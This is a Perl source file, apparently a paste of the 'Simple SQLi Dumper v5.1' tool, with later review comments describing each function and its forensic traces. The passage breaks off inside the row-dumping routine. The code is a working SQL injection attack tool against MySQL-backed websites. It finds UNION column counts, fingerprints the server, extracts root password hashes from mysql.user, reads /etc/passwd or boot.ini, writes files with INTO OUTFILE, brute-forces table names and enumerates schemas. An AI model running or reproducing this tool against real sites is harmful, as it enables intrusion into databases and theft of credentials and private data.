Googleinurl

Simple SQLi Dumper v5.1 for MySQL

Jun 21st, 2014
  1. #!/usr/bin/perl
  2.  
  3. #*******************************************#
  4. #  Simple SQLi Dumper v5.1 for MySQL        #
  5. #  Coded by Vrs-hCk a.k.a c0li.m0de.0n      #
  6. #  E-Mail: ander[at]antisecurity.org        #
  7. #  YM: vrs_hck[at]yahoo.com                 #
  8. #  Blog: http://c0li.blogspot.com           #
  9. #  www.antisecurity.org - www.MainHack.net  #
  10. #*******************************************#
  11.  
  12. use HTTP::Request;
  13. use LWP::UserAgent;
  14. use Getopt::Long;
  15.  
my $datetime = localtime;
my $OS = "$^O";
# Clear the terminal on non-Windows hosts. The shell is invoked with a fixed
# literal only, so no user input reaches it here.
if ($OS ne 'MSWin32') { system("clear"); }

# unhex(hex()) function. 0=disable, 1=enable
# When set, every CONCAT(...) expression built by ssdp_get_data and
# get_mysqlinfo is wrapped in UNHEX(HEX(...)).
$convert = 0;

# Tag shown in a couple of error messages (dump_data, get_content).
$logo = "c0li";
# Sequence appended after every injected expression; overridable with -e.
$end = '--';
# Substitute written in place of spaces inside the request URL; -s.
$spc = '+';
# Upper bound of the column-count loop in get_magic_number; -f.
$field = 123;
# Output log; everything printed is mirrored here by w_log; -log.
$log = 'ssdp.log';
# NOTE(review): none of the globals above is declared with `my`/`our` and the
# file has neither `use strict` nor `use warnings`, so a mistyped name
# silently becomes a new, empty variable.

print "\n [o]=================================================[x]\n";
print "  |             Simple SQLi Dumper v5.1               |\n";
print "  |                Coded by Vrs-hCk                   |\n";
print " [o]=================================================[o]\n";
print "    Date : $datetime\n";
print "    Help Command: -h, -help, --help\n\n";

# Same banner into the log file. w_log is defined further down; the
# parenthesised call resolves it at run time.
w_log("\n [o]=================================================[x]\n".
      "  |             Simple SQLi Dumper v5.1               |\n".
      "  |                Coded by Vrs-hCk                   |\n".
      " [o]=================================================[o]\n".
      "    Log Created : $datetime\n".
      "    Help Command: -h, -help, --help\n\n");
  42.  
# Print the option table (also reached through -h / -help, see GetOptions).
# Every line is a fixed-width row of the same box; the only escapes are the
# double quotes and the "@" in "@@database", which would otherwise
# interpolate an array.
sub usage {
print "\n";
print "  |-----------------------------------------------------------------------------|\n";
print "  | Usage: perl ssdp.pl [options]                                               |\n";
print "  |                                                                             |\n";
print "  | -u [SQLi URL]       target with id parameter or sqli url with c0li string   |\n";
print "  | -e [sqli end tag]   sql injection end tag (default: \"--\")                   |\n";
print "  | -d [database name]  this option should not be used (default: \@\@database)    |\n";
print "  | -t [table name]     table_name                                              |\n";
print "  | -c [columns name]   column_name (example: id,user,pass,email)               |\n";
print "  | -s [space code]     SPACE code: +,/**/,%20 (default: \"+\")                   |\n";
print "  | -f [max field]      max field to get magic number (default: 123)            |\n";
print "  | -start [num]        row number to begin dumping data                        |\n";
print "  | -stop [num]         row number to stop dumping                              |\n";
print "  | -where [query]      your special dumping query                              |\n";
print "  |                                                                             |\n";
print "  | -log [file name]    file name to save ssdp data (default: ssdp.log)         |\n";
print "  | -p [http proxy]     hostname:port                                           |\n";
print "  |                                                                             |\n";
print "  | -magic              Find Magic Number                           [MySQL v4+] |\n";
print "  | -info               Get MySQL Information                       [MySQL v4+] |\n";
print "  | -dbase              Concat Databases                            [MySQL v5+] |\n";
print "  | -table              Concat Tables                               [MySQL v5+] |\n";
print "  | -column             Concat Columns                              [MySQL v5+] |\n";
print "  | -tabcol             Concat Tables with Columns                  [MySQL v5+] |\n";
print "  | -find               Search Columns Name                         [MySQL v5+] |\n";
print "  | -dump               Dump Data                                   [MySQL v4+] |\n";
print "  | -brute              Fuzzing Tables & Columns                    [MySQL v4+] |\n";
print "  |-----------------------------------------------------------------------------|\n";
print "   Please read ssdp-examples.txt for more info :)\n";
print "\n\n";
}
  75.  
# Option targets. None is declared with `my`/`our`: they are package globals
# read directly by every sub below.
$sqli = '';        # -u  target URL; must contain the literal placeholder "c0li"
$database = '';    # -d  schema name; '' means the server's current database()
$table = '';       # -t  table name
$column = '';      # -c  comma-separated column list
$proxy = '';       # -p  host:port of an HTTP proxy
$start = 0;        # -start / -stop  inclusive row range for -dump
$stop = 0;
$where = '';       # -where  extra WHERE clause for -dump
$proxy = '';       # NOTE(review): duplicate of the assignment above; harmless.

# The action flags are Getopt::Long callbacks, which appear to run as soon as
# the flag is parsed, so an action only sees the options that preceded it on
# the command line (`-u URL -info` works, `-info -u URL` fails url_check).
# Every action has the same shape: validate inputs, echo the target and end
# tag to terminal and log, verify the proxy if one is set, run the query.
# All of them exit() on error instead of returning.
GetOptions (
    "u=s" => \$sqli, "e=s" => \$end, "d=s" => \$database, "t=s" => \$table, "c=s" => \$column, "s=s" => \$spc,
    "f=i" => \$field, "start=i" => \$start, "stop=i" => \$stop, "where=s" => \$where, "log=s" => \$log, "p=s" => \$proxy,
    # -info: server fingerprint (database, user, version, OS, file access).
    "info" => sub {
                    url_check();
                    print " [+] c0li SQLi URL: http://$sqli\n";
                    print " [+] SQLi End Tag: $end\n";
                    w_log(" [+] c0li SQLi URL: http://$sqli\n");
                    w_log(" [+] SQLi End Tag: $end\n");
                    proxy_test();
                    get_mysqlinfo($sqli);
                    print "\n Done.\n\n";
                    w_log("\n Done.\n\n");
                  },
    # -dbase: list schema names.
    "dbase" => sub {
                     url_check();
                     print " [+] c0li SQLi URL: http://$sqli\n";
                     print " [+] SQLi End Tag: $end\n";
                     w_log(" [+] c0li SQLi URL: http://$sqli\n");
                     w_log(" [+] SQLi End Tag: $end\n");
                     proxy_test();
                     get_databases();
                   },
    # -table: list tables of $database (or of database() when -d is absent).
    "table" => sub {
                     url_check();
                     print " [+] c0li SQLi URL: http://$sqli\n";
                     print " [+] SQLi End Tag: $end\n";
                     w_log(" [+] c0li SQLi URL: http://$sqli\n");
                     w_log(" [+] SQLi End Tag: $end\n");
                     proxy_test();
                     get_tables($database);
                   },
    # -column: list columns of one table; -t is mandatory here.
    "column" => sub {
                      url_check();
                      if (!$table) { print " [Error] \"-t [table name]\" option is required.\n\n"; exit(); }
                      print " [+] c0li SQLi URL: http://$sqli\n";
                      print " [+] SQLi End Tag: $end\n";
                      w_log(" [+] c0li SQLi URL: http://$sqli\n");
                      w_log(" [+] SQLi End Tag: $end\n");
                      proxy_test();
                      get_columns($database,$table);
                    },
    # -tabcol: every table together with its columns.
    "tabcol" => sub {
                      url_check();
                      print " [+] c0li SQLi URL: http://$sqli\n";
                      print " [+] SQLi End Tag: $end\n";
                      w_log(" [+] c0li SQLi URL: http://$sqli\n");
                      w_log(" [+] SQLi End Tag: $end\n");
                      proxy_test();
                      get_tables_columns($database);
                    },
    # -find: search column names by substring; -c is mandatory here.
    "find" => sub {
                    url_check();
                    if (!$column) { print " [Error] \"-c [column name]\" option is required.\n\n"; exit(); }
                    print " [+] c0li SQLi URL: http://$sqli\n";
                    print " [+] SQLi End Tag: $end\n";
                    w_log(" [+] c0li SQLi URL: http://$sqli\n");
                    w_log(" [+] SQLi End Tag: $end\n");
                    proxy_test();
                    search_columns($database,$column);
                  },
    # -magic: the only action that skips url_check, because the URL does not
    # contain "c0li" yet; get_magic_number produces it and stores it in $sqli.
    "magic" => sub {
                     if (!$sqli) { print " [Error] \"-u [URL]\" option is required.\n\n"; exit(); }
                     if ($sqli =~ /http:\/\// ) { $sqli = str_replace($sqli,"http://",""); }
                     print " [+] URL: http://$sqli\n";
                     print " [+] End Tag: $end\n";
                     w_log(" [+] URL: http://$sqli\n");
                     w_log(" [+] End Tag: $end\n");
                     proxy_test();
                     get_magic_number($sqli);
                   },
    # -dump: read rows; -t and -c are mandatory here.
    "dump" => sub {
                    url_check();
                    if (!$table) { print " [Error] \"-t [table name]\" option is required.\n\n"; exit(); }
                    if (!$column) { print " [Error] \"-c [columns name]\" option is required.\n\n"; exit(); }
                    print " [+] c0li SQLi URL: http://$sqli\n";
                    print " [+] SQLi End Tag: $end\n";
                    w_log(" [+] c0li SQLi URL: http://$sqli\n");
                    w_log(" [+] SQLi End Tag: $end\n");
                    proxy_test();
                    dump_data();
                  },
    # -brute: wordlist guessing of table/column names (tables.dict, columns.dict).
    "brute" => sub {
                     url_check();
                     print " [+] c0li SQLi URL: http://$sqli\n";
                     print " [+] SQLi End Tag: $end\n";
                     w_log(" [+] c0li SQLi URL: http://$sqli\n");
                     w_log(" [+] SQLi End Tag: $end\n");
                     proxy_test();
                     brute_tabcol();
                   },
    "help|h" => sub { usage(); }
);
  179.  
# Validate and normalise the -u target before any action runs.
# Exits the process (never returns false) when no URL was given or when the
# URL lacks the literal "c0li" placeholder that ssdp_get_data substitutes.
# Normalisation: drop a leading "http://" (get_content re-adds it), then
# rewrite spaces, "%20", "+" and "/**/" to the configured $spc. The same
# scheme strip is applied to $proxy. Operates on the globals in place.
sub url_check {
    if (!$sqli) { print " [Error] \"-u [URL]\" option is required.\n\n"; exit(); }
    if ($sqli !~ m/c0li/) { print " [Error] SQLi URL must be included \"c0li\" string.\n\n"; exit(); }
    if ($sqli =~ /http:\/\// ) { $sqli = str_replace($sqli,"http://",""); }
    if ($sqli =~ m/ /) { $sqli = str_replace($sqli," ",$spc); }
    $sqli = str_replace($sqli,"%20",$spc);
    # str_replace treats its second argument as a regex, hence the escapes.
    $sqli = str_replace($sqli,"\\+",$spc);
    $sqli = str_replace($sqli,"/\\*\\*/",$spc);
    if ($proxy =~ /http:\/\// ) { $proxy = str_replace($proxy,'http://',''); }
}
  190.  
# When -p was given, confirm the proxy works by fetching http://www.google.com/
# through it (10 s timeout) and looking for the page <title>. No-op when
# $proxy is empty. On failure the process exits, so the `$proxy = ''` just
# before exit() has no observable effect.
# The bare "Mozilla/5.0" User-Agent is the same one get_content sends; together
# with this fixed google.com probe it is a recognisable pattern in proxy logs.
sub proxy_test {
    if ($proxy) {
        syswrite(STDOUT,"\n Checking HTTP Proxy ...",26);
        w_log("\n Checking HTTP Proxy ...");
        my $ua = LWP::UserAgent->new(agent => "Mozilla/5.0");
        $ua->proxy("http", "http://".$proxy."/");
        $ua->timeout(10);
        my $request = HTTP::Request->new(GET => 'http://www.google.com/');
        my $response = $ua->request($request);
        my $content = $response->content();
        if ($content =~ m/<title>Google<\/title>/g) { print " Good :)\n"; w_log(" Good :)\n"); }
        else { print " Failed :(\n\n"; w_log(" Failed :(\n\n"); $proxy = ''; exit(); }
    }
}
  205.  
# -brute: guess table and column names from two wordlists in the current
# directory, tables.dict and columns.dict (bareword handles; @tables/@columns
# and $tbl/$col are package globals). Each candidate table is probed by
# selecting the constant 0x21346E64337273306E21 — the string '!4nd3rs0n!' —
# FROM it; a response that echoes the marker means the table exists, and
# every column candidate is then probed against that table the same way.
# Cost is one HTTP request per table plus one per (table, column) pair, all
# carrying the same constant marker — a high-volume, easily signatured burst.
# NOTE(review): `<@tables>` / `<@columns>` are not reads from a handle; on a
# non-filehandle operand <...> is glob(), so the arrays are interpolated,
# whitespace-split and each entry is matched against the local filesystem
# before being used — any glob metacharacter in a dictionary entry would be
# expanded.
sub brute_tabcol {
    open(TABLES, 'tables.dict') or die(" Cannot open or read tables.dict !!\n");
    @tables=<TABLES>;
    close(TABLES);
    open(COLUMNS, 'columns.dict') or die(" Cannot open or read columns.dict !!\n");
    @columns=<COLUMNS>;
    close(COLUMNS);
    print "\n Finding Tables & Columns ...\n\n";
    w_log("\n Finding Tables & Columns ...\n\n");
    my $inc = 0;
    while ($tbl = <@tables>) {
        my $concat = '0x21346E64337273306E21';
        my $from = $spc.'FROM'.$spc.$tbl;
        my $tbldata = ssdp_get_data($concat,$from);
        # ssdp_get_data strips its own delimiters, leaving the bare marker.
        if ($tbldata eq '!4nd3rs0n!') {
            $inc++;
            syswrite(STDOUT," [$inc] $tbl: ",255);
            w_log(" [$inc] $tbl: ");
            while ($col = <@columns>) {
                my $coldata = ssdp_get_data($concat.','.$col,$from);
                if ($coldata =~ /!4nd3rs0n!/) {
                    syswrite(STDOUT,$col.',',255);
                    w_log($col.',');
                }
            } print "\n"; w_log("\n");
        }
    } print "\n Done.\n\n"; w_log("\n Done.\n\n");
}
  234.  
# -magic: column-count search. For i = 1..$field it appends
# " AND 1=2 UNION ALL SELECT <m1>,<m2>,...,<mi>" to the URL, each <mk> being
# the hex encoding of '4nd3rs0n<k>4nd3rs3n', and fetches the page. The first
# response that reflects a marker ends the loop: the reflected position is
# replaced by the literal "c0li" placeholder and the other positions by their
# plain index, the resulting URL is printed, stored in the global $sqli and
# handed to get_mysqlinfo. After $field misses the process exits.
# $_[0]: target URL without scheme. Reads $spc, $end, $field; writes $sqli.
# $i and $x are package globals (no `my`); $magic is unused.
# Detection: the strings "4nd3rs0n"/"4nd3rs3n" and the fixed
# "AND 1=2 UNION ALL SELECT" prefix never vary, and the search sends up to
# $field (default 123) requests to one endpoint in quick succession.
sub get_magic_number {
    my $c0li = '';
    my $c0de = '';
    my $url = $_[0];
    my $union = $spc."AND".$spc."1=2".$spc."UNION".$spc.'ALL'.$spc."SELECT".$spc;
    print "\n Attempting to find the magic number...\n\n";
    w_log("\n Attempting to find the magic number...\n\n");
    syswrite(STDOUT," [+] Testing: ",14);
    w_log(" [+] Testing: ");
    for ($i=1; $i<=$field; $i++){
        my $bin = '4nd3rs0n'.$i.'4nd3rs3n';
        my $hex = $bin;
        # Hex-encode the marker so it needs no quotes in the request.
        $hex =~ s/(.)/sprintf("%x",ord($1))/eg;
        # Comma-separate every element after the first. The `$i < $field`
        # guard also sends i == $field through the else branch, so when
        # $field > 1 the final marker is appended without a leading comma.
        if (($i > 1) and ($i < $field)) {
            $c0li = $c0li.",0x".$hex;
            $c0de = $c0de.",".$bin;
        } else {
            $c0li = $c0li."0x".$hex;
            $c0de = $c0de.$bin;
        }
        syswrite(STDOUT,$i.",", 255);
        w_log($i.",");
        my $magic = '';
        my $xpl = $url.$union.$c0li.$end;
        my $content = get_content(0,$xpl);
        if (($content =~ m/4nd3rs0n/i) and ($content =~ m/4nd3rs3n/i)) {
            # $number is the index of the first reflected marker.
            my $number = ssdp_mid_str('4nd3rs0n','4nd3rs3n',$content);
            # Build the plain-text SELECT list: reflected slot -> "c0li",
            # all other slots -> their bare index.
            my $link1 = str_replace($c0de,'4nd3rs0n'.$number.'4nd3rs3n','c0li');
            my $link2 = str_replace($link1,'4nd3rs0n','');
            my $link3 = str_replace($link2,'4nd3rs3n','');
            my $inject = $url.$union.$link3;
            print "\n\n [+] Field Length : $i\n";
            w_log("\n\n [+] Field Length : $i\n");
            print " [+] Magic Number : ";
            w_log(" [+] Magic Number : ");
            # `[$x]` is a character class, not a literal number: for a
            # two-digit $x it matches either single digit.
            for ($x=1; $x<=$i; $x++) { if ($content =~ /4nd3rs0n[$x]4nd3rs3n/i) { print $x.','; w_log($x.','); }}
            print "\n [+] URL Injection: http://$inject\n";
            w_log("\n [+] URL Injection: http://$inject\n");
            # Later helpers read the global, so publish the placeholder URL.
            $sqli = $inject;
            get_mysqlinfo($inject);
            last();
        }
        if ($i == $field) {
            print "\n\n Failed to get magic number. Please try it manually :)\n\n";
            w_log("\n\n Failed to get magic number. Please try it manually :)\n\n");
            exit();
        }
    }
    print "\n Done.\n\n";
    w_log("\n Done.\n\n");
}
  286.  
# Fingerprint the server through the placeholder URL (-info, and the last step
# of -magic). $_[0] is the URL containing "c0li". Up to five requests:
#   1. CONCAT_WS(':', '!c0li', database(), user(), version(),
#      @@version_compile_os, 'c0li!') — 0x2163306C69 / 0x63306C6921 are the
#      '!c0li' / 'c0li!' delimiters the regex below parses.
#   2. Host, User, Password FROM mysql.user WHERE user='root' (0x726F6F74).
#   3. LOAD_FILE() of 0x2F6574632F706173737764 ('/etc/passwd'), or of
#      0x633A2F626F6F742E696E69 ('c:/boot.ini') when the reported OS string
#      contains "nt" or "win"; success is judged by $load_res.
#   4. Only if 3 succeeded: SELECT 0x63306C692E6D3064652E306E ('c0li.m0de.0n')
#      INTO OUTFILE "$test_file", then 5. LOAD_FILE() of that path to confirm.
# Step 4 is a write on the target: it leaves /tmp/c0li-<N>.txt (or /c0li-<N>.txt
# on Windows, N = int rand(666)) behind. That filename pattern and the marker
# content are forensic indicators that this tool ran with FILE privilege.
# $load_file, $load_res, $test_file, $read_file and $undefine are package globals.
sub get_mysqlinfo {
    my $url = $_[0];
    $load_file = '2F6574632F706173737764';
    $load_res = "root:(.+):(.+):(.+):(.+):(.+):(.+)";
    $test_file = '/tmp/c0li-'.(int rand(666)).'.txt';
    $read_file = $test_file;
    $read_file =~ s/(.)/sprintf("%x",ord($1))/eg;
    my $ver_concat = 'CONCAT_WS(0x3a,0x2163306C69,database(),user(),version(),@@version_compile_os,0x63306C6921)';
    # The $convert variant also swaps version() for @@version.
    if ($convert) { $ver_concat = 'UNHEX(HEX(CONCAT_WS(0x3a,0x2163306C69,database(),user(),@@version,@@version_compile_os,0x63306C6921)))'; }
    my $ver_select = str_replace($url,'c0li',$ver_concat);
    print "\n Showing MySQL Information ...\n\n";
    w_log("\n Showing MySQL Information ...\n\n");
    my $ver_content = get_content(0,$ver_select.$end);
    if ($ver_content =~ /!c0li:(.+?):(.+?):(.+?):(.+?):c0li!/i) {
        # Capture order follows the CONCAT_WS argument list.
        my ($db_name,$usr,$ver,$os) = ($1,$2,$3,$4);
        print " [+] Database: $db_name\n";
        print " [+] User: $usr\n";
        print " [+] Version: $ver\n";
        print " [+] System: $os\n";
        w_log(" [+] Database: $db_name\n");
        w_log(" [+] User: $usr\n");
        w_log(" [+] Version: $ver\n");
        w_log(" [+] System: $os\n");
        # Crude OS check on @@version_compile_os; switches the file probes.
        if (($os =~ /nt/i) or ($os =~ /win/i)) {
            $load_file = '633A2F626F6F742E696E69';
            $load_res = 'Boot Loader';
            $test_file = '/c0li-'.(int rand(666)).'.txt';
            $read_file = $test_file;
            $read_file =~ s/(.)/sprintf("%x",ord($1))/eg;
        }
        my $acc_concat = 'CONCAT_WS(0x3a,0x2163306C69,Host,User,Password,0x63306C6921)';
        if ($convert) { $acc_concat = 'UNHEX(HEX(CONCAT_WS(0x3a,0x2163306C69,Host,User,Password,0x63306C6921)))'; }
        my $acc_select = str_replace($url,'c0li',$acc_concat);
        my $acc_content = get_content(0,$acc_select.$spc.'FROM'.$spc.'mysql.user'.$spc.'where'.$spc.'user=0x726F6F74'.$end);
        if ($acc_content =~ /!c0li:(.+?):(.+?):(.+?):c0li!/i) {
            # NOTE(review): $1..$3 are reused across several statements;
            # this only works because w_log runs no regex in between.
            print " [+] Access to \"mysql\" Database: Yes (w00t)\n";
            print "     [-] Host: $1\n";
            print "     [-] User: $2\n";
            print "     [-] Pass: $3\n";
            w_log(" [+] Access to \"mysql\" Database: Yes (w00t)\n");
            w_log("     [-] Host: $1\n");
            w_log("     [-] User: $2\n");
            w_log("     [-] Pass: $3\n");
        } else { print " [+] Access to \"mysql\" Database: No\n"; w_log(" [+] Access to \"mysql\" Database: No\n"); }
        my $file_concat = 'LOAD_FILE(0x'.$load_file.')';
        my $file_select = str_replace($url,'c0li',$file_concat);
        my $file_content = get_content(0,$file_select.$end);
        if ($file_content =~ /$load_res/i) {
            # Decode the hex path back to text for display only.
            $load_file =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex($1))/eg;
            print " [+] Read File \"$load_file\": Yes (w00t)\n";
            w_log(" [+] Read File \"$load_file\": Yes (w00t)\n");
            my $create_concat = '0x63306C692E6D3064652E306E';
            my $create_select = str_replace($url,'c0li',$create_concat);
            my $create_query = $spc.'INTO'.$spc.'OUTFILE'.$spc.'"'.$test_file.'"';
            # Response to the OUTFILE request is fetched and discarded.
            $undefine = get_content(0,$create_select.$create_query.$end); $undefine = '';
            my $read_concat = 'LOAD_FILE(0x'.$read_file.')';
            my $read_select = str_replace($url,'c0li',$read_concat);
            # NOTE(review): shadows the outer `my $file_content` for this scope.
            my $file_content = get_content(0,$read_select.$end);
            if ($file_content =~ /c0li.m0de.0n/i) { print " [+] Create File \"$test_file\": Yes (w00t)\n";
            w_log(" [+] Create File \"$test_file\" : Yes (w00t)\n"); }
            else { print " [+] Create File \"$test_file\": No\n"; w_log(" [+] Create File \"$test_file\": No\n"); }
        }
        else { $load_file =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex($1))/eg;
            print " [+] Read File \"$load_file\": No\n";
            w_log(" [+] Read File \"$load_file\": No\n");
        }
    }
    else {
        print " Failed to get MySQL Information.\n";
        w_log(" Failed to get MySQL Information.\n");
    }
}
  359.  
# -dbase: list schema names from INFORMATION_SCHEMA.SCHEMATA, excluding
# 0x696E666F726D6174696F6E5F736368656D61 ('information_schema'). One request
# for COUNT(*), then one request per name via LIMIT $i,1; each goes through
# ssdp_get_data, so the response is parsed by its 'c0li#'..'#c0li' delimiters.
# Takes no arguments; reads $spc. $i is a package global (no `my`).
sub get_databases {
    my $schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.SCHEMATA'.$spc.'WHERE'.$spc.
    'SCHEMA_NAME'.$spc.'NOT'.$spc.'IN'.$spc.'(0x696E666F726D6174696F6E5F736368656D61)';
    my $count = ssdp_get_data('COUNT(*)',$schema);
    print "\n Showing databases ...\n\n";
    w_log("\n Showing databases ...\n\n");
    syswrite(STDOUT, " [+] DATABASES($count): ", 255);
    w_log(" [+] DATABASES($count): ");
    for ($i=0; $i<$count; $i++) {
        my $inc = ($i+1);
        my $query = $schema.$spc.'LIMIT'.$spc.$i.',1';
        my $db_name = ssdp_get_data('SCHEMA_NAME',$query);
        # Comma after every entry but the last; `$inc>0` is always true here.
        if (($inc>0) and ($inc<$count)) { $db_name = $db_name.','; }
        syswrite(STDOUT,$db_name,255);
        w_log($db_name);
    }
    print "\n\n Done.\n\n";
    w_log("\n\n Done.\n\n");
}
  379.  
# -table: list the tables of one schema with a row count for each.
# $_[0] is the schema name (hex-encoded into the request); when the global
# $database is empty the query uses TABLE_SCHEMA=database() instead and the
# hex value computed first is discarded. Requests: 1 for COUNT(*), then per
# table 1 for TABLE_NAME and 1 for that table's COUNT(*).
# $i is a package global (no `my`).
sub get_tables {
    my $dbhex = $_[0];
    $dbhex =~ s/(.)/sprintf("%x",ord($1))/eg;
    my $tbl_schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.TABLES'.$spc.'WHERE'.$spc.'TABLE_SCHEMA=0x'.$dbhex;
    if (!$database) { $tbl_schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.TABLES'.$spc.'WHERE'.$spc.'TABLE_SCHEMA=database()';
    print " [+] Database Name: database()\n"; w_log(" [+] Database Name: database()\n")}
    else { print " [+] Database Name: $database\n"; w_log(" [+] Database Name: $database\n");}
    my $tbl_count = ssdp_get_data('COUNT(*)',$tbl_schema);
    print " [+] Number of Tables: $tbl_count\n\n";
    print " Showing tables ...\n\n";
    w_log(" [+] Number of Tables: $tbl_count\n\n");
    w_log(" Showing tables ...\n\n");
    for ($i=0; $i<$tbl_count; $i++) {
        my $inc = ($i+1);
        my $query = $tbl_schema.$spc.'LIMIT'.$spc.$i.',1';
        my $tbl_name = ssdp_get_data('TABLE_NAME',$query);
        # Qualified name only when a schema was given on the command line.
        my $data_schema = $spc.'FROM'.$spc.$database.'.'.$tbl_name;
        if (!$database) { $data_schema = $spc.'FROM'.$spc.$tbl_name; }
        my $data_count = ssdp_get_data('COUNT(*)',$data_schema);
        syswrite(STDOUT," [".$inc."] ".$tbl_name."($data_count)\n", 255);
        w_log(" [".$inc."] ".$tbl_name."($data_count)\n");
    }
    print "\n Done.\n\n";
    w_log("\n Done.\n\n");
}
  405.  
# -column: list the columns of one table plus that table's row count.
# $_[0] schema name, $_[1] table name; both are hex-encoded into the
# INFORMATION_SCHEMA.COLUMNS filter. When the global $database is empty the
# filter uses TABLE_SCHEMA=database(). The global $table is also read
# directly for the row count and for display. Requests: 2 for the counts,
# then 1 per column via LIMIT $i,1.
# $i is a package global (no `my`). The "[+] table(count):" header line is
# written to the terminal only, not to the log.
sub get_columns {
    my $dbhex = $_[0];
    $dbhex =~ s/(.)/sprintf("%x",ord($1))/eg;
    my $tblhex = $_[1];
    $tblhex =~ s/(.)/sprintf("%x",ord($1))/eg;
    my $col_schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.COLUMNS'.$spc.'WHERE'.$spc.'TABLE_SCHEMA=0x'.
    $dbhex.$spc.'AND'.$spc.'TABLE_NAME=0x'.$tblhex;
    if (!$database) { $col_schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.COLUMNS'.$spc.'WHERE'.$spc.'TABLE_SCHEMA='.
    'database()'.$spc.'AND'.$spc.'TABLE_NAME=0x'.$tblhex;
    print " [+] Database Name: database()\n"; w_log(" [+] Database Name: database()\n"); }
    else { print " [+] Database Name: $database\n";    w_log(" [+] Database Name: $database\n"); }
    my $col_count = ssdp_get_data("COUNT(*)",$col_schema);
    my $data_schema = $spc.'FROM'.$spc.$database.'.'.$table;
    if (!$database) { $data_schema = $spc.'FROM'.$spc.$table; }
    my $data_count = ssdp_get_data('COUNT(*)',$data_schema);
    print " [+] Table Name: $table\n";
    print " [+] Number of Columns: $col_count\n\n";
    print " Showing columns from table \"$table\" ...\n\n";
    w_log(" [+] Table Name: $table\n");
    w_log(" [+] Number of Columns: $col_count\n\n");
    w_log(" Showing columns from table \"$table\" ...\n\n");
    syswrite(STDOUT, " [+] ".$table."\($data_count\): ", 255);
    for ($i=0; $i<$col_count; $i++) {
        my $inc = ($i+1);
        my $query = $col_schema.$spc.'LIMIT'.$spc.$i.',1';
        my $col_name = ssdp_get_data('COLUMN_NAME',$query);
        # Comma after every entry but the last; `$inc>0` is always true here.
        if (($inc>0) and ($inc<$col_count)) { $col_name = $col_name.','; }
        syswrite(STDOUT,$col_name,255);
        w_log($col_name);
    }
    print "\n\n Done.\n\n";
    w_log("\n\n Done.\n\n");
}
  439.  
# -tabcol: get_tables and get_columns combined — every table of the schema
# with its row count and column list. $_[0] is the schema name; with an empty
# global $database both filters use TABLE_SCHEMA=database().
# Requests: 1 for the table count, then per table 3 (name, row count, column
# count) plus 1 per column. $i and $x are package globals (no `my`).
sub get_tables_columns {
    my $dbhex = $_[0];
    $dbhex =~ s/(.)/sprintf("%x",ord($1))/eg;
    my $tbl_schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.TABLES'.$spc.'WHERE'.$spc.'TABLE_SCHEMA=0x'.$dbhex;
    if (!$database) { $tbl_schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.TABLES'.$spc.'WHERE'.$spc.'TABLE_SCHEMA=database()';
    print " [+] Database Name: database()\n"; w_log(" [+] Database Name: database()\n"); }
    else { print " [+] Database Name: $database\n";    w_log(" [+] Database Name: $database\n"); }
    my $tbl_count = ssdp_get_data('COUNT(*)',$tbl_schema);
    print " [+] Number of Tables: $tbl_count\n";
    print "\n Showing Tables & Columns ...\n\n";
    w_log(" [+] Number of Tables: $tbl_count\n");
    w_log("\n Showing Tables & Columns ...\n\n");
    for ($i=0; $i<$tbl_count; $i++) {
        my $tbl_inc = ($i+1);
        my $tbl_query = $tbl_schema.$spc.'LIMIT'.$spc.$i.',1';
        my $tbl_name = ssdp_get_data('TABLE_NAME',$tbl_query);
        my $data_schema = $spc.'FROM'.$spc.$database.'.'.$tbl_name;
        if (!$database) { $data_schema = $spc.'FROM'.$spc.$tbl_name; }
        my $data_count = ssdp_get_data('COUNT(*)',$data_schema);
        syswrite(STDOUT," [$tbl_inc] ".$tbl_name."($data_count): ", 255);
        w_log(" [$tbl_inc] ".$tbl_name."($data_count): ");
        # The table name just read is hex-encoded for the column filter.
        my $tblhex = $tbl_name;
        $tblhex =~ s/(.)/sprintf("%x",ord($1))/eg;
        my $col_schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.COLUMNS'.$spc.'WHERE'.$spc.'TABLE_SCHEMA=0x'.
        $dbhex.$spc.'AND'.$spc.'TABLE_NAME=0x'.$tblhex;
        if (!$database) { $col_schema = $spc.'FROM'.$spc.'INFORMATION_SCHEMA.COLUMNS'.$spc.'WHERE'.$spc.'TABLE_SCHEMA='.
        'database()'.$spc.'AND'.$spc.'TABLE_NAME=0x'.$tblhex; }
        my $col_count = ssdp_get_data('COUNT(*)',$col_schema);
        for ($x=0; $x<$col_count; $x++) {
            my $col_inc = ($x+1);
            my $col_query = $col_schema.$spc.'LIMIT'.$spc.$x.',1';
            my $col_name = ssdp_get_data('COLUMN_NAME',$col_query);
            if (($col_inc>0) and ($col_inc<$col_count)) { $col_name = $col_name.','; }
            syswrite(STDOUT,$col_name,255);
            w_log($col_name);
        }
        print "\n"; w_log("\n");
    }
    print "\n Done.\n\n"; w_log("\n Done.\n\n");
}
  480.  
# -dump: read rows of $database.$table, the -c columns joined with
# CONCAT_WS(0x203A20, ...) — the separator ' : ' — one request per row via
# LIMIT n,1. Each row is printed and also appended raw to $log, separately
# from w_log's mirroring of the progress messages.
# With -where the clause is inserted into the request unchanged apart from
# spaces becoming $spc, and the loop runs over COUNT(*) of that filter,
# exiting on the first empty row. Without it the loop runs -start..-stop,
# which defaults to the whole table, and an empty row is shown as "<no data>".
# Takes no arguments; reads $column, $database, $table, $where, $start,
# $stop, $spc, $log, $logo. $x and $i are package globals (no `my`).
# NOTE(review): the two `open(LOG,">>$log")` calls are 2-arg opens of a
# user-supplied name through a bareword handle; compare w_log, which does
# the same thing for the log.
sub dump_data {
    my $concat = 'CONCAT_WS(0x203A20,'.$column.')';
    my $data_schema = $spc.'FROM'.$spc.$database.'.'.$table;
    if (!$database) { $data_schema = $spc.'FROM'.$spc.$table; print "\n [+] Database Name: database()\n"; }
    else { print "\n [+] Database Name: $database\n"; }
    my $data_count = ssdp_get_data('COUNT(*)',$data_schema);
    # A count of '0' is false in Perl, so this branch already fires on zero
    # rows and the `== 0` test below is unreachable.
